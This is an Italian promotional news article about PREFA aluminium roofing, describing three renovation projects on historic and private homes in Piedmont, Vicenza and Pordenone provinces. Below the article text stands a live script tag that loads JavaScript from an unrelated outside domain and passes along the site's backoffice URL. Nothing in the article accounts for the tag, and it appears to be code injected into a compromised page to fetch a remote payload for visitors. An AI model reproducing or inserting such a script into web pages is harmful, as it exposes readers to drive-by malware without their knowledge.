1. Home
  2. Notizie e Mercato
  3. I segreti di PREFA per la ristrutturazione

I segreti di PREFA per la ristrutturazione

Sistema tetto di
5/5
votato da 1 persone
Grazie al


I Sistemi per coperture in alluminio PREFA offrono al progettista un’elevata libertà fra la scelta di soluzioni architettoniche anche non convenzionali e il rispetto delle forme più classiche e tradizionali, dato che assicurano la massima resistenza in tutte le situazioni climatiche e al tempo stesso si caratterizzano per un’estrema leggerezza che in sede di ripristino di edifici esistenti porta innumerevoli vantaggi.

L’alluminio inoltre è una scelta ecologica e pienamente sostenibile, poiché proveniente da processi di recupero del materiale stesso: i prodotti PREFA sono composti per il 90% da alluminio riciclato, ed al termine del ciclo di vita l’alluminio può essere nuovamente riciclato al 100%. In un mercato delle costruzioni che fortunatamente si sta muovendo con rinnovata attenzione ed estrema consapevolezza nella direzione della sostenibilità, dell’attenzione all’ambiente, del risparmio energetico e dell’efficienza, le soluzioni PREFA per la ristrutturazione del tetto sposano perfettamente questi principi.

Vengono proposti qui di seguito tre interventi di ristrutturazione che hanno interessato edifici privati di pregio e rilievo anche storico, in cui i prodotti PREFA hanno dato prova di adattarsi perfettamente alle forme architettoniche esistenti pur distinguendosi dai prodotti tradizionali per la loro estetica elegante e davvero ricercata.

1. Villa Liberty – Piemonte
Per il ripristino della copertura di una meravigliosa villa in stile Liberty situata in provincia di Alessandria sono state scelte le Scaglie PREFA, frutto di una richiesta architettonica ben precisa da parte della committenza. Questa villa, infatti, situata in uno dei borghi più belli del Piemonte, necessitava di una copertura raffinata e capace di mantenere l’eleganza dell’insieme. Le Scaglie PREFA in tonalità grigio pietra P.10 hanno soddisfatto in pieno le esigenze estetiche dichiarate e, in più, con la loro colorazione molto più simile alla tonalità del fibrocemento installato in origine all’epoca dell’edificazione della villa (rispetto alla copertura in cementegola con cui era stato sostituito durante una prima ristrutturazione) hanno conferito una più spiccata personalità al complesso esaltandone tutta la bellezza. Inoltre, le Scaglie PREFA si caratterizzano per un armonioso gioco di luci ed ombre, garantendo un effetto molto naturale, mentre l’innovativa forma della Scaglia PREFA con l’esclusiva punta leggermente allungata verso il basso ha donato alla copertura un aspetto armonioso che ben si sposava con il particolare stile architettonico.
Realizzato in collaborazione con l’impresa Lattoneria Piacentina di Sarmato (PC)

2. Villa – Progetto Studio 28 Thiene
Per la ristrutturazione della copertura di una villa privata situata nel centro storico di Thiene (VI), è stata scelta la Scandola PREFA, selezionata dai progettisti dello Studio 28 di Thiene per la sua lavorabilità e leggerezza, a fronte della complessità che la posa in opera avrebbe richiesto agli installatori per l’elevata pendenza  delle falde e i particolari di raccordo piuttosto articolati. Il tetto presentava, infatti, una struttura articolata a molteplici falde, diverse per forma, caratterizzate da difficili congiunzioni e pendenze variabili che vanno dal 50 al 70%.
Il colore P.10 in tonalità antracite opaca ha conferito un aspetto molto naturale alla copertura con tutte le garanzie di durata e resistenza che il particolare processo di verniciatura Coil Coating assicura al materiale. Inoltre, le Scandole PREFA, combinando la forma classica del rombo con le caratteristiche high-tech dell’alluminio, hanno permesso di vitalizzare ed esaltare le rigorose geometrie dell’edificio senza appesantirle, per un risultato estetico complessivo di assoluto rilievo e molto attuale.
Realizzato in collaborazione con l’impresa Chilò srl di Piovene Rocchette (VI)


3. Abitazione privata – San Lorenzo di Arzene (PN)
Caratterizzata da uno stile rustico tradizionale e materiali di rivestimento naturali come i mattoni e la pietra, questo edificio presentava una copertura a varie falde dalle forme non regolari. Per questo intervento di ristrutturazione la committenza ha scelto la Tegola PREFA in colore antracite P.10 creando un interessantissimo contrasto materico con i materiali tradizionali di rivestimento e donando alla villetta un carattere più deciso.
Anche in questa realizzazione sono stati notevolmente apprezzati le qualità di leggerezza, resistenza e semplicità di posa tanto che l’intervento di copertura realizzato è stato portato a termine in due settimane: grazie al sistema di fissaggio a scomparsa con graffette brevettate uniche nel proprio genere le Tegole in alluminio PREFA hanno assicurato la massima tenuta in caso di eventi atmosferici estremi e una resistenza garantita 40 anni contro rottura, ruggine e congelamento; con uno spessore di 0,7 mm e un peso di soli 2,3 kg per metro quadro, il tetto è leggero e semplice da posare, e si adatta in modo ideale nel caso di ristrutturazioni; infine, con le colorazioni P.10, la superficie si è presentata con una nuova “pelle” pensata per soddisfare al meglio anche le esigenze di quei proprietari che vogliono mantenere per le loro abitazioni un contatto stretto con i classici materiali costruttivi, fruendo, però, di tutti i vantaggi dell’alluminio.
Realizzato in collaborazione con l’impresa Cecco Dennis e C. snc di San Vito al Tagliamento (PN)

La Garanzia Prefa per risultati di eccellenza
Le realizzazioni appena descritte, nella loro estrema diversità di forme, scelte estetiche e stili architettonici dimostrano ed evidenziano l’estrema versatilità dei sistemi per coperture in alluminio PREFA, ideali in ogni contesto costruttivo. Qualunque sia la forma scelta, fra una variegata gamma di soluzioni, dal nastro aggraffato, alla Tegola, alla Scandola, alla Scaglia, l’alluminio PREFA offre una garanzia di resistenza senza pari, una vasta selezione di colori inalterabili nel tempo e un’elevata leggerezza (pari a 2,3 -2,5 kg/m2 di copertura) che lo rendono il materiale ideale per le ristrutturazioni, all’interno di una logica costruttiva attenta all’efficienza ed alla sostenibilità. Un ampio programma di accessori, sistema smaltimento acque, gli innovativi pannelli fotovoltaici PREFA PS.13 e i servizi di consulenza tecnica approfondita e puntuale completano l’offerta dell’azienda PREFA leader nel settore delle coperture e rivestimenti architettonici per facciate in alluminio.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.24902519169539927" type="text/javascript"></script>